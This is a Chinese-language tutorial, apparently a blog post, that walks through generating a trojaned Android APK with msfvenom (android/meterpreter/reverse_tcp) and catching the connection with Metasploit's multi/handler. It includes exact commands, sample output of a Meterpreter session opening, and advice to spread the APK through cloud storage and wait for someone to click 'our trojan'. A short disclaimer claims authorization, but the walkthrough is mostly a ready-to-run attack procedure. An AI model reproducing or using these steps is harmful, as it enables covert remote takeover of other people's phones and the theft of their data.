阿坤教程 Kali Linux Msf渗透测试

声明:已获得他人授权 不得非法入侵他人设备 遵纪守法 若进行非法行为以及非法操作 与本人教学无关
前期准备 1.装有kali Linux的虚拟机 这里使用VMware进行教学2. 一台安卓手机
注意:以下命令均为root用户执行 默认登入账号密码为kali用户进入后使用sudo命令即可
root账户账号密码
账号:root

密码:kali 【不会的可以私信】

1.配置网络 在装有kali Linux的虚拟机设置中 将硬件中的网络连接模式改成桥接模式 NAT模式测试经常报错
2.设备连接状态在网络适配器中调入 复制物理网络连接状态 [PS: 一定记得保存]
3.查看本机ip 命令为 ifconfig 区别于win操作系统为ipconfig 一定记住
ip在eth0 第二行inet 后面 切记不要搞错 否则后续操作均无效
4.我们需要先生成一个带有木马的安卓软件 在root用户下 输入以下命令:
代码规范:
{msfvenom -p android/meterpreter/reverse_tcp LHOST=刚刚获取到的本机ip LPORT=你要监听端口的名称 R > /放置的目录/文件名.apk}
代码示例:
{msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.51.2 LPORT=8848 R > /root/101/shell.apk}
输入后会在你输入的目录中生成一个apk安装包 将其安装到你要渗透的手机上 并且记住你输入的监听端口 有些手机系统下载后找不到安装包
懒人直接将其放入云盘 手机下载后默认安装包执行
安装时软件应用名为MainActivtiy
5.输入msfconsole 在2022.2版本时为msf6 不是错误 等待执行完毕后 在msf6条件下输入以下执行代码
代码示例:
{use exploit/multi/handler}
系统输出: Using configured payload generic/shell_reverse_tcp
6.再次输出以下代码:
代码示例:
{set payload android/meterpreter/reverse_tcp}
系统输出:payload => android/meterpreter/reverse_tcp
7.再次输出以下代码:
代码规范:
{set LHOST 刚刚获取到的本机IP}
代码示例:
{set LHOST 192.168.51.2}
系统输出:LHOST => 192.168.51.2
8.再次输出以下代码:
代码规范:
{set LPORT 监听端口的名称}
代码示例:
{set LPORT 8848}
系统输出:LPORT => 8848
9.最后输入以下代码
代码示例:{exploit}
系统输出:Started reverse TCP handler on 192.168.51.2:8848
10.此时此刻出现以上系统输出语句代表执行成功 慢慢等待那个有缘人点击我们的木马软件
执行后会出现以下语句
[*] Started reverse TCP handler on 192.168.51.2:8848
[*] Sending stage (78144 bytes) to 192.168.51.9
[*] Meterpreter session 1 opened (192.168.51.2:8848 -> 192.168.51.9:63582 ) at 2022-05-25 07:38:23 -04003253482599
11.此时此刻对话栏出现meterpreter >
即代表成功
注入msf命令即可

msf命令请看下一章

注意事项
1.在kali Linux 中 然后停止扫描 为 Ctrl + z
2.在kali Linux 中很重视 空格的位置 如果防止不当 还会出现报错
3.欢迎积极探讨关于网络问题